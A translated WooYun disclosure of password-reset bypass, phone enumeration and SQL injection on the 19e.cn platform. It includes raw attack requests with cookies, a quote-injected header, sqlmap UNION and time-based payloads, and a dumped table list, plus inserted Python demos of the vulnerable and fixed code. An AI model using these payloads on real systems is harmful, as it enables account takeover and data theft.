Vulnerability summary (followers: 24)

Defect ID: wooyun-2016-0208646

Title: 19e platform: arbitrary user password reset / mobile number enumeration / SQL injection (about 5 million order records involved)

Vendor: 北京一九易站电子商务有限公司

Author: 路人甲

Submitted: 2016-05-14 23:19

Fixed: 2016-06-30 14:30

Published: 2016-06-30 14:30

Type: design flaw / logic error

Severity: high

Self-assessed rank: 20

Status: confirmed by vendor

Source: http://www.wooyun.org; for questions or help contact [email protected]



Vulnerability details

Disclosure timeline:

2016-05-14: details sent to the vendor, awaiting handling
2016-05-16: vendor confirmed; details visible to the vendor only
2016-05-26: details opened to core white hats and domain experts
2016-06-05: details opened to regular white hats
2016-06-15: details opened to trainee white hats
2016-06-30: details opened to the public

Summary:

While scanning the C-class range of some site I came across this platform and ran a round of tests; by the look of it there are plenty more problems.

Details:

http://g.19e.cn/login/index.jsp
# Mobile number enumeration

b5.png


Capture the request sent when fetching the SMS verification code

b4.png


# Password reset
Enter the username lijing, type any verification code, and capture the request

POST /smsAction_validateShortMessage.do?mobileNum=15516777178&dxyzm=1234 HTTP/1.1
Host: g.19e.cn
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:46.0) Gecko/20100101 Firefox/46.0
Accept: */*
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
X-Requested-With: XMLHttpRequest
Referer: http://g.19e.cn/zhmm/zhmm_index.jsp
Cookie: SSOID=A0E6616917B86A70FBCA454845FC375D-n1; SSAID=2836F7AAEF7DCC4ED40D98F486CE0CD0-n3; JSESSIONID=jWY41CQuJZRZ9rhnY3zG.199
X-Forwarded-For: 8.8.8.8'
Connection: close
Content-Length: 0


b1.png


Change the response body to 0

w1.png


w2.png


lijing/wooyun
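The two flaws above, as an added example (not code from g.19e.cn): a Python model of an SMS reset flow whose verification verdict is only returned to the browser, so that rewriting the step-1 response to 0 lets the reset proceed, and whose code-request endpoint answers differently for unknown numbers, which is what makes mobile enumeration possible. Beside it is a version that records verification state server-side. Endpoint behaviour, the account data and the MAX_ATTEMPTS limit are assumptions; only the endpoint name and parameters (mobileNum, dxyzm) follow the report.

```python
"""Model of the SMS password-reset flow from the report. Added example, not
code from g.19e.cn: the step-1 endpoint mirrors
/smsAction_validateShortMessage.do?mobileNum=...&dxyzm=..., the rest is assumed."""
import hmac
import secrets
from dataclasses import dataclass, field

# Constructed sample data: the one account named in the report.
REGISTERED = {"lijing": "15516777178"}


def _new_code() -> str:
    return f"{secrets.randbelow(10**6):06d}"


@dataclass
class VulnerableResetFlow:
    """Step 1 only tells the browser its verdict; step 2 trusts the browser."""
    sms_codes: dict = field(default_factory=dict)
    passwords: dict = field(default_factory=dict)

    def request_code(self, mobile: str) -> dict:
        # Distinct answers for known and unknown numbers: mobile enumeration.
        if mobile not in REGISTERED.values():
            return {"status": 1, "msg": "mobile not registered"}
        self.sms_codes[mobile] = _new_code()
        return {"status": 0, "msg": "code sent"}

    def validate_code(self, mobile: str, dxyzm: str) -> dict:
        # Nothing is recorded server-side; the JSON verdict is all there is.
        ok = hmac.compare_digest(self.sms_codes.get(mobile, ""), dxyzm)
        return {"status": 0 if ok else 1}

    def reset_password(self, username: str, new_password: str) -> bool:
        # Demands no proof that step 1 succeeded, so rewriting the step-1
        # response to status 0 in a proxy is enough to reach this point.
        if username not in REGISTERED:
            return False
        self.passwords[username] = new_password
        return True


@dataclass
class HardenedResetFlow:
    """Verification state lives on the server and is bound to the account."""
    MAX_ATTEMPTS = 5  # assumed limit; stops brute-forcing a 6-digit code
    sms_codes: dict = field(default_factory=dict)
    attempts: dict = field(default_factory=dict)
    reset_tokens: dict = field(default_factory=dict)  # token -> username
    passwords: dict = field(default_factory=dict)

    def request_code(self, mobile: str) -> dict:
        # Identical response whether or not the number exists.
        if mobile in REGISTERED.values():
            self.sms_codes[mobile] = _new_code()
            self.attempts[mobile] = 0
        return {"status": 0, "msg": "if this number is registered, a code was sent"}

    def validate_code(self, mobile: str, dxyzm: str) -> dict:
        expected = self.sms_codes.get(mobile)
        if expected is None or self.attempts[mobile] >= self.MAX_ATTEMPTS:
            return {"status": 1}
        self.attempts[mobile] += 1
        if not hmac.compare_digest(expected, dxyzm):
            return {"status": 1}
        # Correct code: consume it and mint a one-time token for the owner.
        del self.sms_codes[mobile]
        username = next(u for u, m in REGISTERED.items() if m == mobile)
        token = secrets.token_urlsafe(32)
        self.reset_tokens[token] = username
        return {"status": 0, "reset_token": token}

    def reset_password(self, token: str, new_password: str) -> bool:
        # Only a token minted by validate_code works, and only once.
        username = self.reset_tokens.pop(token, None)
        if username is None:
            return False
        self.passwords[username] = new_password
        return True


def replay_attack() -> dict:
    """Wrong code plus a forged step-1 verdict, against both flows."""
    vuln = VulnerableResetFlow()
    vuln.request_code("15516777178")
    verdict = vuln.validate_code("15516777178", "1234")   # {"status": 1}
    verdict = {"status": 0}                                # rewritten in the proxy
    vuln_ok = verdict["status"] == 0 and vuln.reset_password("lijing", "wooyun")

    hard = HardenedResetFlow()
    hard.request_code("15516777178")
    hard.validate_code("15516777178", "1234")              # no token issued
    hard_ok = hard.reset_password("any-forged-token", "wooyun")
    return {"vulnerable_reset_ok": vuln_ok, "hardened_reset_ok": hard_ok}
```

Two checks worth running against any flow of this shape: submit a wrong code, forge the client-visible verdict and see whether the reset still completes; and request codes for one registered and one unregistered number and diff the two responses.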


Proof of vulnerability:

# SQL injection
The injection points are the account name and employee name fields

b2.png


POST /account_queryList.do HTTP/1.1
Host: g.19e.cn
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:46.0) Gecko/20100101 Firefox/46.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Referer: http://g.19e.cn/account_queryList.do
Cookie: SSOID=A0E6616917B86A70FBCA454845FC375D-n1; SSAID=2836F7AAEF7DCC4ED40D98F486CE0CD0-n3; JSESSIONID=yzH9LFXcgruwY7a9qcgE.199
X-Forwarded-For: 8.8.8.8'
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 109
addCount=20&account.accountName=DSD&account.realName=&temStatus=-1&account.startTime=&account.endTime=&flag=1


Place: POST
Parameter: account.accountName
Type: UNION query
Title: Generic UNION query (NULL) - 10 columns
Payload: addCount=20&account.accountName=1%' UNION ALL SELECT NULL,NULL,CHR(58)||CHR(122)||CHR(98)||CHR(117)||CHR(58)||CHR(117)||CHR(75)||CHR(78)||CHR(122)||CHR(119)||CHR(72)||CHR(77)||CHR(106)||CHR(112)||CHR(79)||CHR(58)||CHR(100)||CHR(116)||CHR(112)||CHR(58),NULL,NULL,NULL,NULL,NULL,NULL,NULL FROM DUAL-- &account.realName=&temStatus=-1&account.startTime=&account.endTime=&flag=1
Type: AND/OR time-based blind
Title: Oracle AND time-based blind
Payload: addCount=20&account.accountName=1%' AND 3610=DBMS_PIPE.RECEIVE_MESSAGE(CHR(122)||CHR(120)||CHR(114)||CHR(81),5) AND '%'='&account.realName=&temStatus=-1&account.startTime=&account.endTime=&flag=1
---
back-end DBMS: Oracle
available databases [7]:
[*] CTXSYS
[*] EXFSYS
[*] MDSYS
[*] OLAPSYS
[*] STOCKWEB
[*] SYS
[*] SYSTEM
Database: STOCKWEB
[60 tables]
+---------------------------+
| BXY |
| GHC_BAK_20130801 |
| GHC_BAK_20130802 |
| GHC_BIH_STAT_INFO |
| GHC_BIH_STAT_RULE |
| GHC_CHANNEL_AUTO_DISCOUNT |
| GHC_CHANNEL_DISCOUNT |
| GHC_CHANNEL_INFO |
| GHC_CHANNEL_MAPPING |
| GHC_CHANNEL_SUPPORTCITY |
| GHC_CHANNEL_SUPPORTMONEY |
| GHC_CHANNEL_WARNINFO |
| GHC_CODE_CITY |
| GHC_CODE_PROVINCEINFO |
| GHC_MODIFY_CHANNEL_LOG |
| GHC_ORDER_COUNTERACT |
| GHC_ORDER_INFO |
| GHC_ORDER_INFO_CF201208 |
| GHC_ORDER_INFO_HIS |
| GHG_CHANNEL_DETAIL |
| GHG_CHANNEL_ERROR_INFO |
| GHG_CHARGEORDER |
| GHG_MANUAL_RECORDS |
| GHG_REQUEST |
| GHG_USERDETAIL |
| GHK_CITY |
| GHK_DISTRICT |
| GHK_LEVEL |
| GHK_LOWESTSALEPRICE |
| GHK_LOWESTSALEPRICE_RULE |
| GHK_MODIFYMONEY_REVIEW |
| GHK_ORDER_REVIEW |
| GHK_PRODUCT_TASK |
| GHK_PROVINCE |
| GHK_TRANSACTION_VOLUME |
| GHM_ACCOUNT |
| GHM_ADMIN |
| GHM_BAK_0811 |
| GHM_BAK_0812 |
| GHM_CHECKORDER |
| GHM_DELETEUSERS |
| GHM_DELETEUSERTEMP |
| GHM_LETTER |
| GHM_MENU |
| GHM_NOTICE |
| GHM_OPERATELOG |
| GHM_PHONE_VALIDATE |
| GHM_REVELSALREFUND |
| GHM_SAFESET |
| GHM_USERREADNOTICELOG |
| GHM_USERS |
| GHM_USERS_ALTERLOG |
| GHM_USER_MENU |
| GHM_WALLETINFO |
| GH_NTY_TEMPLATE |
| HF_ACCSEGMENT |
| MSG_SEND_DETAIL_INFO |
| MSG_SEND_MANAGER_INFO |
| TEST_1015 |
| T_USER |
+---------------------------+


Database: STOCKWEB
+----------------+---------+
| Table | Entries |
+----------------+---------+
| GHC_ORDER_INFO | 5270414 |
+----------------+---------+
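Added example, not code from g.19e.cn: the account search behind account_queryList.do rebuilt in Python on SQLite, to show why the sqlmap payload's leading 1%' works and what the parameterised fix looks like. SQLite stands in for the Oracle back end the report identified, so the Oracle-only parts of the page's payloads (CHR()||... markers, FROM DUAL, DBMS_PIPE.RECEIVE_MESSAGE) are not reproduced; the columns of GHM_ACCOUNT and GHM_ADMIN and every row are constructed, only the table names come from the list above.

```python
"""Vulnerable vs. parameterised account search, modelled on account_queryList.do.
Added example: SQLite in place of Oracle, constructed schema and rows."""
import sqlite3


def make_db() -> sqlite3.Connection:
    # Constructed sample data, not records from the real system.
    con = sqlite3.connect(":memory:")
    con.executescript("""
        CREATE TABLE GHM_ACCOUNT (ID INTEGER, ACCOUNT_NAME TEXT, REAL_NAME TEXT, STATUS INTEGER);
        CREATE TABLE GHM_ADMIN   (ID INTEGER, LOGIN_NAME TEXT, PASSWD TEXT, ROLE TEXT);
        INSERT INTO GHM_ACCOUNT VALUES (1, 'DSD',    'Zhang San', 1);
        INSERT INTO GHM_ACCOUNT VALUES (2, 'lijing', 'Li Jing',   1);
        INSERT INTO GHM_ADMIN   VALUES (1, 'admin',  'S3cr3t!',   'super');
    """)
    return con


def query_accounts_vulnerable(con: sqlite3.Connection, account_name: str) -> list:
    # account.accountName is spliced into a LIKE pattern. That is why the
    # report's payload starts with 1%' : it closes the quoted '%...%' pattern.
    sql = ("SELECT ID, ACCOUNT_NAME, REAL_NAME, STATUS FROM GHM_ACCOUNT "
           f"WHERE ACCOUNT_NAME LIKE '%{account_name}%'")
    return con.execute(sql).fetchall()


def escape_like(value: str, esc: str = "\\") -> str:
    # Bind parameters stop injection; escaping stops wildcard abuse
    # (a bare % or _ would otherwise turn the search into a full dump).
    return (value.replace(esc, esc + esc)
                 .replace("%", esc + "%")
                 .replace("_", esc + "_"))


def query_accounts_safe(con: sqlite3.Connection, account_name: str) -> list:
    sql = ("SELECT ID, ACCOUNT_NAME, REAL_NAME, STATUS FROM GHM_ACCOUNT "
           "WHERE ACCOUNT_NAME LIKE ? ESCAPE '\\'")
    return con.execute(sql, (f"%{escape_like(account_name)}%",)).fetchall()


# Same shape as the sqlmap UNION payload on the page: close the LIKE pattern,
# pad to the column count of the original SELECT (4 here, 10 in the report),
# pull rows from another table, and comment out the trailing %' with --.
UNION_PAYLOAD = ("1%' UNION ALL SELECT NULL, LOGIN_NAME, PASSWD, NULL "
                 "FROM GHM_ADMIN--")


def demo() -> dict:
    """Runs the payload through both versions plus a legitimate search."""
    con = make_db()
    return {
        "vulnerable": query_accounts_vulnerable(con, UNION_PAYLOAD),
        "safe": query_accounts_safe(con, UNION_PAYLOAD),
        "legit": query_accounts_safe(con, "DSD"),
    }
```

The column count is the part of the sqlmap output worth reading closely: "Generic UNION query (NULL) - 10 columns" says the real SELECT returns ten columns, which is why the page's payload pads nine NULLs around one CHR()-built marker string. The second, time-based payload (DBMS_PIPE.RECEIVE_MESSAGE with a 5-second wait) is the fallback for when UNION output is not reflected in the page.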

Remediation:

Asking for 20 rank

Copyright: when reposting, credit the source 路人甲@乌云


Responses

Vendor response:

Severity: high

Rank: 13

Confirmed: 2016-05-16 14:23

Vendor reply:

Confirmed that the vulnerability does exist; a fix is in progress.

Latest status:

None yet